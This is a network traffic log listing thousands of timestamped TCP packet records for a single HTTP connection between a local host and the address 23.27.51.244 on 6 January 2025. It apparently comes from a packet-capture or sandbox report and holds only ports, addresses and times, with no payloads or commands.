Jan 6, 2025 06:03:59.451724052 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451730013 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451739073 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451746941 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.451750994 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.451775074 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.451797962 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.452136040 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.453183889 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.538614988 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.538640976 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.538650036 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.538702965 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.538706064 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.538716078 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.538757086 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.538758993 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.538758039 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.538769007 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.538780928 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.538795948 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.538810968 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.538943052 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.538954020 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.538961887 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.538984060 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.538995028 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539009094 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539019108 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539021969 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.539031029 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539047003 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.539047003 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.539078951 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.539079905 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.539132118 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539141893 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539150953 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539160013 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539169073 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539184093 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.539212942 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.539263010 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539288044 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539341927 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.539376020 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539385080 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539397955 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539406061 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.539439917 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.539439917 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.539560080 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539570093 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539577961 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539586067 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539594889 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539603949 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539608955 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.539613962 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539633989 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.539633989 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.539663076 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.539824009 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539833069 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539841890 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539850950 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539860964 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539865971 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.539870024 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539880037 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539889097 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.539899111 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.539918900 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.539942026 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.540038109 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540046930 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540055990 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540076017 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.540101051 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.540296078 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540306091 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540313959 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540323019 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540333033 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540342093 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540343046 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.540350914 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540359020 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.540360928 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540369987 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540380001 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540379047 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.540390968 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540399075 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.540422916 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.540422916 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.540661097 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540669918 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540678978 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540688038 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540697098 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540700912 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.540707111 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540715933 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540721893 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.540725946 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540735006 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540741920 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.540744066 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540752888 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540761948 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540771008 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.540783882 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.540783882 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.540783882 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.540807009 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.541148901 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541157961 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541167021 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541178942 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541183949 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541193008 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541202068 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541208029 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.541208029 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.541239977 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.541239977 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.541311979 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541321039 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541330099 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541338921 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541347980 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541359901 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.541385889 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.541558981 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541568995 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541577101 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541585922 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541594982 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541603088 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541611910 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541619062 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.541620016 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541619062 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.541630030 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541644096 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541646957 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.541646957 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.541654110 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541663885 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541671038 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.541673899 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541682959 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541695118 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.541708946 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.541708946 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.541728020 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.541745901 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.542052984 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542061090 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542069912 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542078972 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542088032 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542094946 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.542097092 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542105913 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542114973 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542120934 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.542124033 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542145014 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.542145014 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.542145967 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542154074 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542162895 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542169094 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.542171955 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542180061 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542190075 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.542191029 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542190075 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.542198896 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542207956 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542213917 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.542217970 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542227030 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542233944 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.542236090 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542253017 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.542253017 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.542274952 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.542649031 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542656898 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542665005 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542675018 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.542690992 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.542716980 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.629174948 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629215956 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629225016 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629235983 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629249096 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629259109 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629302979 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.629311085 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629355907 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.629385948 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.629396915 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629406929 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629416943 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629426956 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629436970 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629443884 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.629498005 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.629540920 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629551888 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629560947 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629582882 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629582882 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.629595995 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629602909 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.629626989 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.629740000 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629750967 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629761934 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629770994 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629782915 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629784107 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.629793882 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629800081 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.629829884 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.629844904 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.629892111 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629900932 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629936934 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629937887 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.629945993 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629956007 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629973888 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629982948 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.629986048 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.630007982 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.630034924 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.630175114 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630187035 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630198002 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630207062 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630222082 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630228043 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.630263090 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.630263090 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.630342960 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630352974 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630362988 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630378008 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630378962 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.630389929 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630397081 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.630399942 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630410910 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630420923 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630422115 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.630431890 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630443096 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630453110 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.630470991 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.630645037 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630664110 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630676031 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630686045 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.630711079 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.630743980 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630755901 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630765915 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630775928 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630784988 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630790949 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.630795002 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630805969 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.630826950 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.630827904 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.630857944 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.631036043 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631051064 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631078959 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.631114960 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.631151915 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631164074 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631172895 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631184101 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631192923 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631202936 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631206989 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.631215096 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631222010 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.631226063 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631236076 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631242990 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.631246090 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631268024 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.631289959 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.631479025 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631489038 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631499052 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631524086 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.631545067 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.631649971 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631659985 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631669998 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631675005 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631685019 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631695032 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631705999 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631707907 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.631716013 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631722927 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.631726980 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631743908 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631743908 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.631753922 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631766081 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631773949 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.631777048 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.631777048 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.631799936 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.631824017 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.631999969 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632010937 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632045031 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.632147074 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632157087 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632165909 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632177114 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632186890 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632188082 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.632196903 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632206917 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632209063 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.632217884 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632227898 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.632237911 CET	80	49709	23.27.51.244	192.168.2.6
